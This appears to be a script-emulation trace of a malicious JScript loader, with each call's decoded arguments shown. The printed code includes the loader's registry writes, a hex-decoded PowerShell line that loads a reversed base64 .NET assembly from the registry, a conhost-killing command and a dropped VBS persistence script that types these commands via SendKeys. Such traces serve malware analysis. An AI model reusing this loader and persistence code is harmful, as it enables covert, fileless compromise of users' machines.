AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQgAQJ/DAAAAAAAAAbsRmLlVmcvN2ctBgbpFWTlhXRy92QfBAAAAAAAAAAAAAAAAkGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAQoAAAAAAAAAAAAAAQOAgYkBnL0IDMyYDM4IDXnVnYlREXqJ2bcRjMwIjNwgjMcRjMwIjNwgjMcNHduVWb1N2bExlbp1GZhx1cyV2cVxlODBAAAEwY9ILaXDljT6EtH9/XU418TR0USBAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAECjAAwPMCAAAoFAAAgAAAAAAcpHkiNAAAAAAAAA0CFRBBFRBBFAAAAAAAAAAAAAAIAdlNVZjJXdvNXZSVWbpRnb1JlLzV2YyV3bzVmUu0WZ0NXeTNSO4ATZ0MTOxYTNjVTY3cjY94WZr9GV5V2SjlGbiVHUgwCbhJHd1Vmb9Umc1RHb1NEIsAjLw4CMuQTPu9WazJXZWBCLilGby92Yz1GIsIXZkFWZSV2YyV3bzVmUuMXZjJXdvNXZS5SblR3c5NFbAAAARCAAAEgvvrszAAAA0CAAAAAAzdmbpRHdlNlL510CAEAEAAwclNWa2JXZTJWZX5SeN5AABMBAAIXZzVlL510BAEADAAgbvlGdhNWasBHcB5SeN5AABMBAAIXZ0VHct92QukXTLAQAQAAAA81XlNmbhR3cul0XfV2cvB3cpR0Ef9VZj5WY0NnbJ91XlRXYlJ3QSw2bj9GdvJHU05WZpx2QwRHdIBXYvNlL") ➔ undefined
                                                                                                                                                    90
                                                                                                                                                    writeToRegistry ( directoryName, "i", hexToAscii ( processName ) );
                                                                                                                                                    • hexToAscii("4D534275696C642E657865") ➔ "MSBuild.exe"
                                                                                                                                                    • writeToRegistry("YLhjFraZZwiadZg","i","MSBuild.exe") ➔ undefined
                                                                                                                                                    91
                                                                                                                                                    writeToRegistry ( directoryName, "Path", directoryName );
                                                                                                                                                    • writeToRegistry("YLhjFraZZwiadZg","Path","YLhjFraZZwiadZg") ➔ undefined
                                                                                                                                                    92
                                                                                                                                                    writeToRegistry ( directoryName, "v", replaceString ( hexToAscii ( placeholder ), "|path|", directoryName ) );
                                                                                                                                                    • hexToAscii("7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655C7C706174687C27202D4E616D65202773277B297D2E73207C20466F72456163682D4F626A656374207B7B7D245F7B5B7D2D312E2E2D7B287D245F2E4C656E6774687B297D7B5D7D7B7D7D7B297D7B297D7B297D3B207B5B7D612E617B5D7D3A3A617B287D277C706174687C277B297D") ➔ "{[}AppDomain{]}::CurrentDomain.Load{(}[Convert{]}::FromBase64String{(}{(}-join {(}Get-ItemProperty -LiteralPath 'HKCU:\Software\|path|' -Name 's'{)}.s | ForEach-Object {{}$_{[}-1..-{(}$_.Length{)}{]}{}}{)}{)}{)}; {[}a.a{]}::a{(}'|path|'{)}"
                                                                                                                                                    • replaceString("{[}AppDomain{]}::CurrentDomain.Load{(}[Convert{]}::FromBase64String{(}{(}-join {(}Get-ItemProperty -LiteralPath 'HKCU:\Software\|path|' -Name 's'{)}.s | ForEach-Object {{}$_{[}-1..-{(}$_.Length{)}{]}{}}{)}{)}{)}; {[}a.a{]}::a{(}'|path|'{)}","|path|","YLhjFraZZwiadZg") ➔ "{[}AppDomain{]}::CurrentDomain.Load{(}[Convert{]}::FromBase64String{(}{(}-join {(}Get-ItemProperty -LiteralPath 'HKCU:\Software\YLhjFraZZwiadZg' -Name 's'{)}.s | ForEach-Object {{}$_{[}-1..-{(}$_.Length{)}{]}{}}{)}{)}{)}; {[}a.a{]}::a{(}'YLhjFraZZwiadZg'{)}"
                                                                                                                                                    • writeToRegistry("YLhjFraZZwiadZg","v","{[}AppDomain{]}::CurrentDomain.Load{(}[Convert{]}::FromBase64String{(}{(}-join {(}Get-ItemProperty -LiteralPath 'HKCU:\Software\YLhjFraZZwiadZg' -Name 's'{)}.s | ForEach-Object {{}$_{[}-1..-{(}$_.Length{)}{]}{}}{)}{)}{)}; {[}a.a{]}::a{(}'YLhjFraZZwiadZg'{)}") ➔ undefined
                                                                                                                                                    93
                                                                                                                                                    writeToRegistry ( directoryName, "cn", hexToAscii ( "53746F702D50726F63657373202D4E616D6520636F6E686F7374202D466F726365" ) );
                                                                                                                                                    • hexToAscii("53746F702D50726F63657373202D4E616D6520636F6E686F7374202D466F726365") ➔ "Stop-Process -Name conhost -Force"
                                                                                                                                                    • writeToRegistry("YLhjFraZZwiadZg","cn","Stop-Process -Name conhost -Force") ➔ undefined
                                                                                                                                                    94
                                                                                                                                                    splitAndSaveToRegistry ( inputFile );
                                                                                                                                                    • splitAndSaveToRegistry("000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003306000000C000200100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0D0E397C626D656373716F2C3A0D0A0D0E3D2D20202A0D0E39736E65646E656075646F2C30202A0D0E397C626D65637371447E65646E656075646F2C302020202A0D0E3F20202020202020202A0D022A222D35676165776E616C602020202020202020202A0D0226646136636364343134363265393536322D3E656B6F6459756B43696C626570702020202020202020202A0D022A222D356275747365647968636271427F637375636F6270702020202020202020202A0D02203E203E203E26322D3E6F6963727566702020202020202020202A0D02237C6F62747E6F634D2E6F6D6D6F634E23777F646E69675E24766F637F6273696D422D356D616E602020202020202020202A0D0222333E6967722D35607974702020202020202020202A0D097479647E656469497C626D656373716C3020202020202A0D0E397C626D65637371447E65646E656075646C302020202A0D0E39736E65646E656075646C30202A0D0D2D212C30202A0D0E3D2D2029227564716C60246E616020585023777F646E6967582023776F6C61696460246E6160237C6F62747E6F63602E6F6D6D6F636023777F646E696750227F666023756D65686470256C62616E65402D2D212C30202A0D0A0D0E3D2D20202A0D0E3E6F69647163696C6070716F2C30202A0D0E33776E696474756353777F646E69677F2C302020202A0D0E35627167714960746F2C356572747E3223776E696474756353777F646E69675F253030323F294D435F2D6F636E24766F637F6273696D6E23716D656863637F2F2A30747478622D337E6C6D687025627167714960746C3020202020202A0D0E33776E696474756353777F646E69677C302020202A0D0E3223367E2D63716A3D6F636D24766F637F6273696D6D23716D656863637A3E6275722D337E6C6D68702E6F69647163696C6070716C30202A0D0D2D212C30202A0D0E3D2D202E2769666E6F636E207071602279656864702E6960272565727477202F6470276E69647475637027276E696A796375625F64757149607448676968437D627F6643777F646E6967556C62616E65472025686470247563702F637C61602020202020202A0D00246C657F6863702C276E69647475637023796864702F647E696024707F602471686470263E24302B627F67756D6162764024554E4E20276E6964756762716470237E6F69647163696C60707160237D627F664023777F646E6967502E2E696024707F602F64702020202020202A0D002465656E60247F6E602F6460246E616025627167716D29405440297C6C61636964716D6F6475716025627160237E6F69647163696C607071602926405758202E6F696471646E657F66402E6F696471647E65637562705023777F646E6967502E23794054402020202020202A0D0275686769686024716023777F646E69675029726024656C61636370297C6C61636964716D6F64757160256260247F6E602C6C696770246E616025627167716D294054402379602E6F69647163696C60707160256864702471686470237564716369646E69402D2D212C30202A0D0A0D0E3974796C6962696471607D6F636F2C30202A0D0E3E6F69647163696C6070716F2C302020202A0D0A0D0") ➔ undefined
                                                                                                                                                    95
                                                                                                                                                    mainFile = shellInstance.ExpandEnvironmentStrings ( "%UserProfile%" ) + "\\" + directoryName + ".vbs";
                                                                                                                                                    • ExpandEnvironmentStrings("%UserProfile%") ➔ "C:\Users\totti"
                                                                                                                                                    96
                                                                                                                                                    }
                                                                                                                                                      97
                                                                                                                                                      function createTextFile(filePath, content) {
                                                                                                                                                      • createTextFile("C:\Users\totti\YLhjFraZZwiadZg.vbs","Option Explicit 'Project Name: YLhjFraZZwiadZg ' D\xe9claration des variables Dim objShell, windowsDir, i Set objShell = CreateObject("WScript.Shell") windowsDir = objShell.ExpandEnvironmentStrings("%windir%") ' Fonction pour v\xe9rifier si un processus sp\xe9cifique est en cours d'ex\xe9cution Function IsProcessRunning(processName) Dim objWMIService, colProcesses Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'") IsProcessRunning = (colProcesses.Count > 0) End Function ' Subroutine pour ex\xe9cuter une s\xe9quence de commandes dans PowerShell Sub RunPowerShellCommands() Dim colProcesses, objProcess ' Lancer PowerShell en mode fen\xeatr\xe9 normal objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2 ' Attendre que PowerShell soit lanc\xe9 et envoyer des commandes Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process") For Each objProcess In colProcesses If StrComp(objProcess.Name, "powershell.exe", vbTextCompare) = 0 Then With objShell .AppActivate objProcess.ProcessId .SendKeys .RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\v") .SendKeys "{ENTER}" .SendKeys .RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\cn") .SendKeys "{ENTER}" WScript.Sleep 5000 End With Exit For End If Next End Sub ' Boucle principale For i = 0 To 10000 ' R\xe9duit le nombre d'it\xe9rations pour les besoins de d\xe9monstration. If Not IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\i")) Then RunPowerShellCommands() End If WScript.Sleep(10000) Next") ➔ undefined
                                                                                                                                                      98
                                                                                                                                                      var fileSystem = new ActiveXObject ( "Scripting.FileSystemObject" );
                                                                                                                                                        99
                                                                                                                                                        if ( fileSystem.FileExists ( filePath ) )
                                                                                                                                                        • FileExists("C:\Users\totti\YLhjFraZZwiadZg.vbs") ➔ false
                                                                                                                                                        100
                                                                                                                                                        {
                                                                                                                                                          101
                                                                                                                                                          fileSystem.DeleteFile ( filePath );
                                                                                                                                                            102
                                                                                                                                                            }
                                                                                                                                                              103
                                                                                                                                                              var textFile = fileSystem.CreateTextFile ( filePath, true );
                                                                                                                                                              • CreateTextFile("C:\Users\totti\YLhjFraZZwiadZg.vbs",true) ➔
                                                                                                                                                              104
                                                                                                                                                              textFile.Write ( content );
                                                                                                                                                              • Write("Option Explicit 'Project Name: YLhjFraZZwiadZg ' D\xe9claration des variables Dim objShell, windowsDir, i Set objShell = CreateObject("WScript.Shell") windowsDir = objShell.ExpandEnvironmentStrings("%windir%") ' Fonction pour v\xe9rifier si un processus sp\xe9cifique est en cours d'ex\xe9cution Function IsProcessRunning(processName) Dim objWMIService, colProcesses Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'") IsProcessRunning = (colProcesses.Count > 0) End Function ' Subroutine pour ex\xe9cuter une s\xe9quence de commandes dans PowerShell Sub RunPowerShellCommands() Dim colProcesses, objProcess ' Lancer PowerShell en mode fen\xeatr\xe9 normal objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2 ' Attendre que PowerShell soit lanc\xe9 et envoyer des commandes Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process") For Each objProcess In colProcesses If StrComp(objProcess.Name, "powershell.exe", vbTextCompare) = 0 Then With objShell .AppActivate objProcess.ProcessId .SendKeys .RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\v") .SendKeys "{ENTER}" .SendKeys .RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\cn") .SendKeys "{ENTER}" WScript.Sleep 5000 End With Exit For End If Next End Sub ' Boucle principale For i = 0 To 10000 ' R\xe9duit le nombre d'it\xe9rations pour les besoins de d\xe9monstration. If Not IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\i")) Then RunPowerShellCommands() End If WScript.Sleep(10000) Next") ➔ undefined
                                                                                                                                                              105
                                                                                                                                                              textFile.Close ( );
                                                                                                                                                              • Close() ➔ undefined
                                                                                                                                                              106
                                                                                                                                                              }
                                                                                                                                                                107
                                                                                                                                                                function replaceString(originalString, oldSubstring, newSubstring) {
                                                                                                                                                                • replaceString("{[}AppDomain{]}::CurrentDomain.Load{(}[Convert{]}::FromBase64String{(}{(}-join {(}Get-ItemProperty -LiteralPath 'HKCU:\Software\|path|' -Name 's'{)}.s | ForEach-Object {{}$_{[}-1..-{(}$_.Length{)}{]}{}}{)}{)}{)}; {[}a.a{]}::a{(}'|path|'{)}","|path|","YLhjFraZZwiadZg") ➔ "{[}AppDomain{]}::CurrentDomain.Load{(}[Convert{]}::FromBase64String{(}{(}-join {(}Get-ItemProperty -LiteralPath 'HKCU:\Software\YLhjFraZZwiadZg' -Name 's'{)}.s | ForEach-Object {{}$_{[}-1..-{(}$_.Length{)}{]}{}}{)}{)}{)}; {[}a.a{]}::a{(}'YLhjFraZZwiadZg'{)}"
                                                                                                                                                                • replaceString("Option Explicit 'Project Name: |path| ' D\xe9claration des variables Dim objShell, windowsDir, i Set objShell = CreateObject("WScript.Shell") windowsDir = objShell.ExpandEnvironmentStrings("%windir%") ' Fonction pour v\xe9rifier si un processus sp\xe9cifique est en cours d'ex\xe9cution Function IsProcessRunning(processName) Dim objWMIService, colProcesses Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'") IsProcessRunning = (colProcesses.Count > 0) End Function ' Subroutine pour ex\xe9cuter une s\xe9quence de commandes dans PowerShell Sub RunPowerShellCommands() Dim colProcesses, objProcess ' Lancer PowerShell en mode fen\xeatr\xe9 normal objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2 ' Attendre que PowerShell soit lanc\xe9 et envoyer des commandes Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process") For Each objProcess In colProcesses If StrComp(objProcess.Name, "powershell.exe", vbTextCompare) = 0 Then With objShell .AppActivate objProcess.ProcessId .SendKeys .RegRead("HKEY_CURRENT_USER\Software\|path|\v") .SendKeys "{ENTER}" .SendKeys .RegRead("HKEY_CURRENT_USER\Software\|path|\cn") .SendKeys "{ENTER}" WScript.Sleep 5000 End With Exit For End If Next End Sub ' Boucle principale For i = 0 To 10000 ' R\xe9duit le nombre d'it\xe9rations pour les besoins de d\xe9monstration. If Not IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\Software\|path|\i")) Then RunPowerShellCommands() End If WScript.Sleep(10000) Next","|path|","YLhjFraZZwiadZg") ➔ "Option Explicit 'Project Name: YLhjFraZZwiadZg ' D\xe9claration des variables Dim objShell, windowsDir, i Set objShell = CreateObject("WScript.Shell") windowsDir = objShell.ExpandEnvironmentStrings("%windir%") ' Fonction pour v\xe9rifier si un processus sp\xe9cifique est en cours d'ex\xe9cution Function IsProcessRunning(processName) Dim objWMIService, colProcesses Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'") IsProcessRunning = (colProcesses.Count > 0) End Function ' Subroutine pour ex\xe9cuter une s\xe9quence de commandes dans PowerShell Sub RunPowerShellCommands() Dim colProcesses, objProcess ' Lancer PowerShell en mode fen\xeatr\xe9 normal objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2 ' Attendre que PowerShell soit lanc\xe9 et envoyer des commandes Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process") For Each objProcess In colProcesses If StrComp(objProcess.Name, "powershell.exe", vbTextCompare) = 0 Then With objShell .AppActivate objProcess.ProcessId .SendKeys .RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\v") .SendKeys "{ENTER}" .SendKeys .RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\cn") .SendKeys "{ENTER}" WScript.Sleep 5000 End With Exit For End If Next End Sub ' Boucle principale For i = 0 To 10000 ' R\xe9duit le nombre d'it\xe9rations pour les besoins de d\xe9monstration. If Not IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\i")) Then RunPowerShellCommands() End If WScript.Sleep(10000) Next"
                                                                                                                                                                108
                                                                                                                                                                return originalString.split ( oldSubstring ).join ( newSubstring );
                                                                                                                                                                • "{[}AppDomain{]}::CurrentDomain.Load{(}[Convert{]}::FromBase64String{(}{(}-join {(}Get-ItemProperty -LiteralPath 'HKCU:\Software\|path|' -Name 's'{)}.s | ForEach-Object {{}$_{[}-1..-{(}$_.Length{)}{]}{}}{)}{)}{)}; {[}a.a{]}::a{(}'|path|'{)}".split("|path|") ➔ {[}AppDomain{]}::CurrentDomain.Load{(}[Convert{]}::FromBase64String{(}{(}-join {(}Get-ItemProperty -LiteralPath 'HKCU:\Software\,' -Name 's'{)}.s | ForEach-Object {{}$_{[}-1..-{(}$_.Length{)}{]}{}}{)}{)}{)}; {[}a.a{]}::a{(}','{)}
                                                                                                                                                                • {[}AppDomain{]}::CurrentDomain.Load{(}[Convert{]}::FromBase64String{(}{(}-join {(}Get-ItemProperty -LiteralPath 'HKCU:\Software\,' -Name 's'{)}.s | ForEach-Object {{}$_{[}-1..-{(}$_.Length{)}{]}{}}{)}{)}{)}; {[}a.a{]}::a{(}','{)}.join("YLhjFraZZwiadZg") ➔ "{[}AppDomain{]}::CurrentDomain.Load{(}[Convert{]}::FromBase64String{(}{(}-join {(}Get-ItemProperty -LiteralPath 'HKCU:\Software\YLhjFraZZwiadZg' -Name 's'{)}.s | ForEach-Object {{}$_{[}-1..-{(}$_.Length{)}{]}{}}{)}{)}{)}; {[}a.a{]}::a{(}'YLhjFraZZwiadZg'{)}"
                                                                                                                                                                • "Option Explicit 'Project Name: |path| ' D\xe9claration des variables Dim objShell, windowsDir, i Set objShell = CreateObject("WScript.Shell") windowsDir = objShell.ExpandEnvironmentStrings("%windir%") ' Fonction pour v\xe9rifier si un processus sp\xe9cifique est en cours d'ex\xe9cution Function IsProcessRunning(processName) Dim objWMIService, colProcesses Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'") IsProcessRunning = (colProcesses.Count > 0) End Function ' Subroutine pour ex\xe9cuter une s\xe9quence de commandes dans PowerShell Sub RunPowerShellCommands() Dim colProcesses, objProcess ' Lancer PowerShell en mode fen\xeatr\xe9 normal objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2 ' Attendre que PowerShell soit lanc\xe9 et envoyer des commandes Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process") For Each objProcess In colProcesses If StrComp(objProcess.Name, "powershell.exe", vbTextCompare) = 0 Then With objShell .AppActivate objProcess.ProcessId .SendKeys .RegRead("HKEY_CURRENT_USER\Software\|path|\v") .SendKeys "{ENTER}" .SendKeys .RegRead("HKEY_CURRENT_USER\Software\|path|\cn") .SendKeys "{ENTER}" WScript.Sleep 5000 End With Exit For End If Next End Sub ' Boucle principale For i = 0 To 10000 ' R\xe9duit le nombre d'it\xe9rations pour les besoins de d\xe9monstration. If Not IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\Software\|path|\i")) Then RunPowerShellCommands() End If WScript.Sleep(10000) Next".split("|path|") ➔ Option Explicit 'Project Name: , ' D\xe9claration des variables Dim objShell, windowsDir, i Set objShell = CreateObject("WScript.Shell") windowsDir = objShell.ExpandEnvironmentStrings("%windir%") ' Fonction pour v\xe9rifier si un processus sp\xe9cifique est en cours d'ex\xe9cution Function IsProcessRunning(processName) Dim objWMIService, colProcesses Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'") IsProcessRunning = (colProcesses.Count > 0) End Function ' Subroutine pour ex\xe9cuter une s\xe9quence de commandes dans PowerShell Sub RunPowerShellCommands() Dim colProcesses, objProcess ' Lancer PowerShell en mode fen\xeatr\xe9 normal objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2 ' Attendre que PowerShell soit lanc\xe9 et envoyer des commandes Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process") For Each objProcess In colProcesses If StrComp(objProcess.Name, "powershell.exe", vbTextCompare) = 0 Then With objShell .AppActivate objProcess.ProcessId .SendKeys .RegRead("HKEY_CURRENT_USER\Software\,\v") .SendKeys "{ENTER}" .SendKeys .RegRead("HKEY_CURRENT_USER\Software\,\cn") .SendKeys "{ENTER}" WScript.Sleep 5000 End With Exit For End If Next End Sub ' Boucle principale For i = 0 To 10000 ' R\xe9duit le nombre d'it\xe9rations pour les besoins de d\xe9monstration. If Not IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\Software\,\i")) Then RunPowerShellCommands() End If WScript.Sleep(10000) Next
                                                                                                                                                                • Option Explicit 'Project Name: , ' D\xe9claration des variables Dim objShell, windowsDir, i Set objShell = CreateObject("WScript.Shell") windowsDir = objShell.ExpandEnvironmentStrings("%windir%") ' Fonction pour v\xe9rifier si un processus sp\xe9cifique est en cours d'ex\xe9cution Function IsProcessRunning(processName) Dim objWMIService, colProcesses Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'") IsProcessRunning = (colProcesses.Count > 0) End Function ' Subroutine pour ex\xe9cuter une s\xe9quence de commandes dans PowerShell Sub RunPowerShellCommands() Dim colProcesses, objProcess ' Lancer PowerShell en mode fen\xeatr\xe9 normal objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2 ' Attendre que PowerShell soit lanc\xe9 et envoyer des commandes Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process") For Each objProcess In colProcesses If StrComp(objProcess.Name, "powershell.exe", vbTextCompare) = 0 Then With objShell .AppActivate objProcess.ProcessId .SendKeys .RegRead("HKEY_CURRENT_USER\Software\,\v") .SendKeys "{ENTER}" .SendKeys .RegRead("HKEY_CURRENT_USER\Software\,\cn") .SendKeys "{ENTER}" WScript.Sleep 5000 End With Exit For End If Next End Sub ' Boucle principale For i = 0 To 10000 ' R\xe9duit le nombre d'it\xe9rations pour les besoins de d\xe9monstration. If Not IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\Software\,\i")) Then RunPowerShellCommands() End If WScript.Sleep(10000) Next.join("YLhjFraZZwiadZg") ➔ "Option Explicit 'Project Name: YLhjFraZZwiadZg ' D\xe9claration des variables Dim objShell, windowsDir, i Set objShell = CreateObject("WScript.Shell") windowsDir = objShell.ExpandEnvironmentStrings("%windir%") ' Fonction pour v\xe9rifier si un processus sp\xe9cifique est en cours d'ex\xe9cution Function IsProcessRunning(processName) Dim objWMIService, colProcesses Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set colProcesses = objWMIService.ExecQuery("SELECT * FROM Win32_Process WHERE Name='" & processName & "'") IsProcessRunning = (colProcesses.Count > 0) End Function ' Subroutine pour ex\xe9cuter une s\xe9quence de commandes dans PowerShell Sub RunPowerShellCommands() Dim colProcesses, objProcess ' Lancer PowerShell en mode fen\xeatr\xe9 normal objShell.Run windowsDir & "\system32\WindowsPowerShell\v1.0\powershell.exe", 2 ' Attendre que PowerShell soit lanc\xe9 et envoyer des commandes Set colProcesses = GetObject("winmgmts:").InstancesOf("Win32_Process") For Each objProcess In colProcesses If StrComp(objProcess.Name, "powershell.exe", vbTextCompare) = 0 Then With objShell .AppActivate objProcess.ProcessId .SendKeys .RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\v") .SendKeys "{ENTER}" .SendKeys .RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\cn") .SendKeys "{ENTER}" WScript.Sleep 5000 End With Exit For End If Next End Sub ' Boucle principale For i = 0 To 10000 ' R\xe9duit le nombre d'it\xe9rations pour les besoins de d\xe9monstration. If Not IsProcessRunning(objShell.RegRead("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\i")) Then RunPowerShellCommands() End If WScript.Sleep(10000) Next"
                                                                                                                                                                109
                                                                                                                                                                }
                                                                                                                                                                  110
                                                                                                                                                                  function writeToRegistry(keyPath, valueName, value) {
                                                                                                                                                                  • writeToRegistry("YLhjFraZZwiadZg","r","00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000234D000000C000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300E2000300E2000300E20013000000E600F6009600370027005600650002009700C6002600D600560037003700140010008000830000000300E2000300E2000300E20013000000E600F600960037002700560065004700360057004600F600270005001000800043000000130007000700140037007700F6004600E60096007500000000005600D6001600E4004700360057004600F600270005001000C00083000000C600C6004600E200130007000700140037007700F6004600E6009600750000005600D6001600E6005600C60096006400C6001600E6009600760096002700F40010000100840000000000000000003700B60027001600D60056004600160027004500C600160076005600C40010001000A20000004300230003002300020002009A0002004700860076009600270097000700F600340000004700860076009600270097000700F6003400C600160076005600C4001000210084000000C600C6004600E200130007000700140037007700F6004600E6009600750000005600D6001600E400C6001600E600270056004700E600940010000100040000000300E2000300E2000300E200130000000000E600F600960037002700560065005600C600960064001000800003000000130007000700140037007700F6004600E6009600750000000000E600F6009600470007009600270036003700560044005600C600960064001000C000040000000000000000005600D6001600E4009700E60016000700D600F600340010001000220000000000000037004700E6005600D600D600F600340010001000A1000000030026004300030003000300030003001000002086000000F6006600E60094005600C600960064007600E600960027004700350010000020C8400B00000000000000E600F600960047001600C6003700E60016002700450000004000420000000000F6006600E60094005600C600960064002700160065001000000044000000000000000000000000000000200000004000000000000000F30000000000100000000000000010000000100000EFFE40DB0000000000F4006400E4009400F500E400F40094003500250054006500F5003500650000004330C20000000000000000000030C20000088500000084000000000010000000000000000000000000000008000003000000100010000000000000000000000000000008000081000000010010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100020052FF0000000000C6C646E2565627F63637D600E69616D4C6C64427F634F5000000000000000000000000264B0000000000000000000000000000000000000000000002000000262C00000000000000000000268A00264607E2130707143777F646E69675C57657265644C5A626F6C5130707143777F646E69675C54323032363038323C53747E656D65736F644C5E696D64616C53727563755C5A33400000010634D72C087DAE5B8245EDFAA65F09256354435250000000000000000000000000000000100000000000000000000000000004402") ➔ undefined
